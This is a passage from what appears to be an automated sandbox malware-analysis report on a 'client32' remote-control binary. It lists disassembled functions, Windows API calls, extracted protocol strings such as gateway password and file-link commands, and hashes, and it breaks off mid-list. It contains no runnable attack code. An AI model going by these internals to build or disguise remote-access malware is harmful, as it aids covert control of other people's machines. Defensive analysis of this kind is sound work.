                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                                                                        • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                                        • API String ID: 3896832720-3703587661
                                                                                                                        • Opcode ID: 8ad65fbfb9edc6d97113b092c94a711564aa7160940e34b45cad3c846fea24c6
                                                                                                                        • Instruction ID: 770bbceb526b1b97399ff1f8ed56e5cd3388290f45b4577b88f391df738258f7
                                                                                                                        • Opcode Fuzzy Hash: 8ad65fbfb9edc6d97113b092c94a711564aa7160940e34b45cad3c846fea24c6
                                                                                                                        • Instruction Fuzzy Hash: D2019CB1C922646ACA60BB7E5C08ECE7A98EBD7352B830517FC04E6200F6744441CFAD
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
                                                                                                                          • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                          • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
                                                                                                                          • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
                                                                                                                          • Part of subcall function 110424D0: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 1104253A
                                                                                                                          • Part of subcall function 110424D0: GetWindowLongA.USER32(00000000,000000F0), ref: 11042541
                                                                                                                          • Part of subcall function 110424D0: IsWindow.USER32(00000000), ref: 1104254E
                                                                                                                          • Part of subcall function 110424D0: GetWindowRect.USER32(00000000,11049320), ref: 11042565
                                                                                                                        • GetCursorPos.USER32(?), ref: 11049334
                                                                                                                        • WindowFromPoint.USER32(?,?,?,?,00000000), ref: 1104935B
                                                                                                                        • GetClassNameA.USER32(00000000,?,00000040), ref: 1104936D
                                                                                                                        • WaitForInputIdle.USER32(?,000003E8), ref: 11049488
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 1104949B
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 110494A4
                                                                                                                        • GetCursorPos.USER32(?), ref: 110494AD
                                                                                                                        • EnumWindows.USER32(110425D0,?), ref: 11049504
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 11049520
                                                                                                                        • WindowFromPoint.USER32(?,?,?,?,?,?,?,00000000), ref: 1104953A
                                                                                                                        • GetClassNameA.USER32(00000000,?,00000040), ref: 11049549
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows_memset_strncpy
                                                                                                                        • String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
                                                                                                                        • API String ID: 4093120923-2853765610
                                                                                                                        • Opcode ID: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
                                                                                                                        • Instruction ID: 1967bb51930ead73ce48ca5e19d163332f2271a687d5ff16e8e37c73a50f3493
                                                                                                                        • Opcode Fuzzy Hash: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
                                                                                                                        • Instruction Fuzzy Hash: 82A1C575E01229AFDB11CFA0CCC5FAAB7B9EB4A704F1041F9E919A7280E7316944CF61
                                                                                                                        APIs
                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 110ED2AE
                                                                                                                        • GetStockObject.GDI32(0000000F), ref: 110ED2C2
                                                                                                                        • GetDC.USER32(00000000), ref: 110ED33A
                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 110ED34B
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 110ED351
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110ED36C
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000001), ref: 110ED380
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 110ED383
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 110ED38B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1969595663-0
                                                                                                                        • Opcode ID: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
                                                                                                                        • Instruction ID: 99ab53906cf2362fb71f393f1a059b673ec6ad63d3e9dfc730451934018f7e7b
                                                                                                                        • Opcode Fuzzy Hash: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
                                                                                                                        • Instruction Fuzzy Hash: 747193B1E01229AFDB01DFE9CC89BEEB7B9FF88714F148056FA15E7244D67499008B61
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 685A4D1C
                                                                                                                        • _free.LIBCMT ref: 685A4E16
                                                                                                                        • _free.LIBCMT ref: 685A4E5D
                                                                                                                        • _free.LIBCMT ref: 685A4E8B
                                                                                                                        • _free.LIBCMT ref: 685A4EB9
                                                                                                                          • Part of subcall function 685A7B60: _sprintf.LIBCMT ref: 685A7B77
                                                                                                                          • Part of subcall function 685A77E0: _free.LIBCMT ref: 685A77EF
                                                                                                                        • _free.LIBCMT ref: 685A4EF6
                                                                                                                          • Part of subcall function 685963C0: EnterCriticalSection.KERNEL32(685DB898,00000000,?,00000000,?,6859D77B,00000000), ref: 685963E8
                                                                                                                          • Part of subcall function 685963C0: InterlockedDecrement.KERNEL32(-0003F3B7), ref: 685963FA
                                                                                                                          • Part of subcall function 685963C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6859D77B,00000000), ref: 68596412
                                                                                                                          • Part of subcall function 685963C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859643B
                                                                                                                          • Part of subcall function 685963C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859646F
                                                                                                                          • Part of subcall function 685963C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 685964A3
                                                                                                                          • Part of subcall function 685963C0: _memset.LIBCMT ref: 685965C8
                                                                                                                          • Part of subcall function 685963C0: LeaveCriticalSection.KERNEL32(?,?,6859D77B,00000000), ref: 685965D7
                                                                                                                          • Part of subcall function 685963C0: LeaveCriticalSection.KERNEL32(685DB898,?,00000000,?,6859D77B,00000000), ref: 685965F2
                                                                                                                        • _free.LIBCMT ref: 685A4EED
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • _free.LIBCMT ref: 685A4F09
                                                                                                                        • SetLastError.KERNEL32(?), ref: 685A4F12
                                                                                                                          • Part of subcall function 68598C30: _memset.LIBCMT ref: 68598C5B
                                                                                                                          • Part of subcall function 68598C30: _free.LIBCMT ref: 68598CCC
                                                                                                                          • Part of subcall function 68598B50: _memset.LIBCMT ref: 68598B68
                                                                                                                          • Part of subcall function 68598B50: wsprintfA.USER32 ref: 68598B87
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$CriticalSection_memset$AddressProc$EnterErrorLastLeave$DecrementFreeHeapInterlocked_sprintfwsprintf
                                                                                                                        • String ID: CMD=PUTFILELINK$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$LINK=%s$ON=%s$PWD=%s$SUB=%s
                                                                                                                        • API String ID: 2025600352-1925890548
                                                                                                                        • Opcode ID: 8bc68279fb7c7a0bcb301af513f49fc0cc6040012a713d66e69809e99d5e6c43
                                                                                                                        • Instruction ID: b6daf296b3693ded6426296a4fddc879f4e23bd2df7b1c323a826f5c34a91a51
                                                                                                                        • Opcode Fuzzy Hash: 8bc68279fb7c7a0bcb301af513f49fc0cc6040012a713d66e69809e99d5e6c43
                                                                                                                        • Instruction Fuzzy Hash: CA619576C40248ABDF11DBE4CC90FFEBBB8AF84304F904149E915BB245EB31A945CBA5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • _memset.LIBCMT ref: 685A0FAD
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,685D0E3D,?,?,?,?,?,?,00000000), ref: 685A1293
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,00000000), ref: 685A12E3
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,685D0E3D,?,?,?,?,?,?,00000000), ref: 685A1316
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,00000000), ref: 685A132D
                                                                                                                        • std::exception::exception.LIBCMT ref: 685A135B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685A1376
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                                        • String ID: 0f]h$CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
                                                                                                                        • API String ID: 275297366-4148050440
                                                                                                                        • Opcode ID: a35f97122e9a8ebb71d7bd563c7905ef89721ef604c00d881922f59d0baa7c3e
                                                                                                                        • Instruction ID: 47af7e990493cb89dc2e192d2e92cecb101a4b348e4db8ab30454d13630f5143
                                                                                                                        • Opcode Fuzzy Hash: a35f97122e9a8ebb71d7bd563c7905ef89721ef604c00d881922f59d0baa7c3e
                                                                                                                        • Instruction Fuzzy Hash: 3BC18EB5D40259AFDF10DFA4DCC1AEEBBB4BF54304F80056AD81AA6204E7355E88CB66
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,7E4636A2,00000001,?,?,00000000,11185E66,000000FF,?,1110421F,00000000,?,?,?), ref: 1110332D
                                                                                                                          • Part of subcall function 111347D0: GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 111347F3
                                                                                                                          • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11134814
                                                                                                                          • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11134824
                                                                                                                          • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 11134841
                                                                                                                          • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 1113484D
                                                                                                                          • Part of subcall function 111347D0: _memset.LIBCMT ref: 11134867
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,1110421F,00000000,?,?,?), ref: 1110337F
                                                                                                                        • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 111033B6
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 1110343F
                                                                                                                        • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 111034C1
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 111034E3
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 111034F0
                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11103509
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,1110421F), ref: 11103570
                                                                                                                        • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,1110421F), ref: 11103597
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,1110421F), ref: 111035EF
                                                                                                                          • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                          • Part of subcall function 11103110: EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                          • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                          • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                          • Part of subcall function 11103110: LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                          • Part of subcall function 110F3BB0: WaitForSingleObject.KERNEL32(?,00000000,?,?,111049C5,?,TerminateVistaUI), ref: 110F3BC1
                                                                                                                          • Part of subcall function 110F3BB0: InterlockedExchange.KERNEL32(?,00000000), ref: 110F3BCD
                                                                                                                          • Part of subcall function 110F3BB0: CloseHandle.KERNEL32(00000000), ref: 110F3BD8
                                                                                                                          • Part of subcall function 110F3BB0: InterlockedIncrement.KERNEL32(111EC5B4), ref: 110F3C05
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 111035F6
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103646
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103651
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLibrary$AddressProc$CloseCountFreeTick$CriticalErrorInterlockedLastLoadModuleOpenProcessSectionToken$EnterExchangeIncrementInformationLeaveObjectSingleVersionWait_memset
                                                                                                                        • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$psapi.dll
                                                                                                                        • API String ID: 555709589-617439319
                                                                                                                        • Opcode ID: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
                                                                                                                        • Instruction ID: 7102d60838122e4a6cb8a6baed9df5fda1baf24c5a04c60c3b4407c25d2de74c
                                                                                                                        • Opcode Fuzzy Hash: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
                                                                                                                        • Instruction Fuzzy Hash: 80A14975D0426A9FDB249F558DC5ADEFBB4BB08304F4085EEE659E3240D7705AC08F61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • getpeername.WSOCK32(?,?,?,685D0E3D,?,?,?,?), ref: 685A2198
                                                                                                                        • htons.WSOCK32(?,?,?,?,?,685D0E3D,?,?,?,?), ref: 685A21A9
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,?,?,685D0E3D,?,?,?,?), ref: 685A21D9
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?), ref: 685A220C
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,?,?,685D0E3D,?,?,?,?), ref: 685A2217
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?), ref: 685A2227
                                                                                                                        • std::exception::exception.LIBCMT ref: 685A226B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685A2286
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$Exception@8Throw_malloc_memsetgetpeernamehtonsstd::exception::exceptionwsprintf
                                                                                                                        • String ID: '.Zh$0f]h$FNAME$FSIZE$LINK$LWT$RESULT$SUB$a3Zh
                                                                                                                        • API String ID: 205723298-1718257289
                                                                                                                        • Opcode ID: 5e58fbd1e4420e745822c42949db7773b39d835b6cb59605cb24d54befee342a
                                                                                                                        • Instruction ID: 17518058462df5a95a9e859a237f361c255b55374482354ad01fd19c26f869ce
                                                                                                                        • Opcode Fuzzy Hash: 5e58fbd1e4420e745822c42949db7773b39d835b6cb59605cb24d54befee342a
                                                                                                                        • Instruction Fuzzy Hash: DE913BB5D00259AFDF10DFA8CC81AEEBBB5FF98304F90452AE959E7200EB305A45CB55
                                                                                                                        APIs
                                                                                                                        • __wcstoui64.LIBCMT ref: 6859A057
                                                                                                                          • Part of subcall function 685B49AE: strtoxl.LIBCMT ref: 685B49D0
                                                                                                                        • ctl_getsession.HTCTL32(?), ref: 6859A09B
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?), ref: 6859A0BA
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859A0EB
                                                                                                                        • _strncat.LIBCMT ref: 6859A132
                                                                                                                        • _free.LIBCMT ref: 6859A22F
                                                                                                                        • _free.LIBCMT ref: 6859A238
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection_free$EnterLeave__wcstoui64_strncatctl_getsessionstrtoxl
                                                                                                                        • String ID: 226546$CLIENT_NAME=%s$CMD=CONNECT_REPLY$CONNECTION_ID$CONNECTION_ID=%u$CONTROL_ADDR$CONTROL_NAME$NC_$RESULT=%d$a3Zh
                                                                                                                        • API String ID: 1400833098-69946554
                                                                                                                        • Opcode ID: b256f6c7ce97a1aca1d35756cddfb36b1f3e01d72d418d40c6b43bb2cffb1d26
                                                                                                                        • Instruction ID: 4ae83a8f46d686d6f8a303bb35ff146247ae8d90184a57b7d0eaee9e9555265b
                                                                                                                        • Opcode Fuzzy Hash: b256f6c7ce97a1aca1d35756cddfb36b1f3e01d72d418d40c6b43bb2cffb1d26
                                                                                                                        • Instruction Fuzzy Hash: F57172B5D40248AFCF11DFE8DC80BEEBBF9AF48304F948429E855EB204E77499458B65
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                        • SetCursor.USER32(00000000,?,00000000), ref: 110F53CB
                                                                                                                        • ShowCursor.USER32(00000000), ref: 110F53D8
                                                                                                                        • OpenEventA.KERNEL32(00100000,00000000,NSLockExit), ref: 110F53E9
                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5413
